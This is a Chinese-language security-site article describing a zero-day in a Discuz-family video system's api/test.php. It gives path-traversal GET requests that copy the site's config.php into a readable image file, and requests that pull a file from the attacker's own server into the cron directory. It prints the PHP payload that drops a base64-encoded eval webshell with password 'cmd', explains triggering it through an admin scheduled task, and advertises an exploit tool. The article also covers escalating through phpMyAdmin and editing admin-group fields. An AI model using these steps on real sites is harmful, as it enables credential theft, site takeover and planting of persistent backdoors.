首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
discuz旗下产品
来源:www.goodbyehack.cn 作者:君董 发布时间:2009-03-02  
  1. $str=file_get_contents$thumb );//首先第18行用file_get_contents() 读取$thumb参数的文件内容,注意这里也可以读远程文件,  
  2. $path = ".".getthumb_path( $vid );//第19行获取路径参数 $vid  
  3. $opt_big = array(  
  4.  
  5. "targetfile" => $path.".jpg",  
  6.  
  7. "attach" => $attach['attach'],  
  8.  
  9. "ext" => $attach['extension'],  
  10.  
  11. "ratio" => false,  
  12.  
  13. "width" => THUMB_BIG_WIDTH,  
  14.  
  15. "height" => THUMB_BIG_HEIGHT  
  16.  
  17. ); //24行到39行定义$opt_big和$opt_small数组  
  18.  
  19. @sf_copy( $opt_big['targetfile'], $opt_small['targetfile'] );//紧接着第40行就开始copy了,注意看,把$opt_big数组里的targetfile复制到$opt_small数组的targetfile 

 

漏洞形成,直接以get方式请求

api/test.php?thumb=../config.php&vid=../../1
会把config.php复制到根目录下1.jpg

这样就得到了网站的配置文件,phpmyadmin连上去,如果是root连接,直接导出shell,不会的查查对应文章,这里不再叙述。

如果不是root,就注册个账号,连上去把用户的admgid改成1 在sv_members表里

接下来讲后台获取shell,

前面test.php代码file_get_contents() 可以读取远程文件写入到网站目录

api/test.php?thumb=http://你的空间地址/test.txt&vid=../../../../inc/crons/1
写到inc/crons/1.jpg

test.txt内容

<?php fputs(fopen("111.php","w"),base64_decode("PD9ldmFsKCRfUE9TVFtjbWRdKTs/Pg=="));?>
作用是在当前目录生成111.php 内容是LANKER的一句话,密码cmd

为什么写这里,等下就知道了,进入后台,点上方的辅助工具,新增计划任务

 

1.jpg
大小: 9.06 K
尺寸: 500 x 122
浏览: 1 次
点击打开新窗口浏览全图

 

 

2.jpg
大小: 16.04 K
尺寸: 457 x 268
浏览: 1 次
点击打开新窗口浏览全图

 

 

3.jpg
大小: 9.74 K
尺寸: 500 x 112
浏览: 1 次
点击打开新窗口浏览全图

 

提交就执行了inc/crons/1.jpg内容会在根目录下生成111.php内容是LANKER的一句话,密码cmd
成功拿到shell,完了记得删除那个计划任务,不然网站就打不开了,

现在已开发出利用在这款0day的工具。

见图

 

4.jpg
大小: 27.68 K
尺寸: 500 x 240
浏览: 1 次
点击打开新窗口浏览全图

 

supev 1.0.1 0day.rar

希望拿了这款工具的朋友到作者blog报个到


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·ShopEx 4.7.2 0day
·远古视频点播系统的一个注入漏洞
·诺基亚 N95-8 (JPG File) Remote
·诺基亚 N95-8 browser (setAttri
·ewebeditor最新版本漏洞
·phpcms2008-0day ask/search_aja
·魅力企业网站管理系统 2009 SP3
·浅析LxBlog V6变量未初始化漏洞
·Discuz!论坛wap功能模块编码的注
·hzhost6.5虚拟主机管理系统最新S
·尘月网络企业网站智能管理系统漏
·PHP popen()函数缓冲区溢出漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved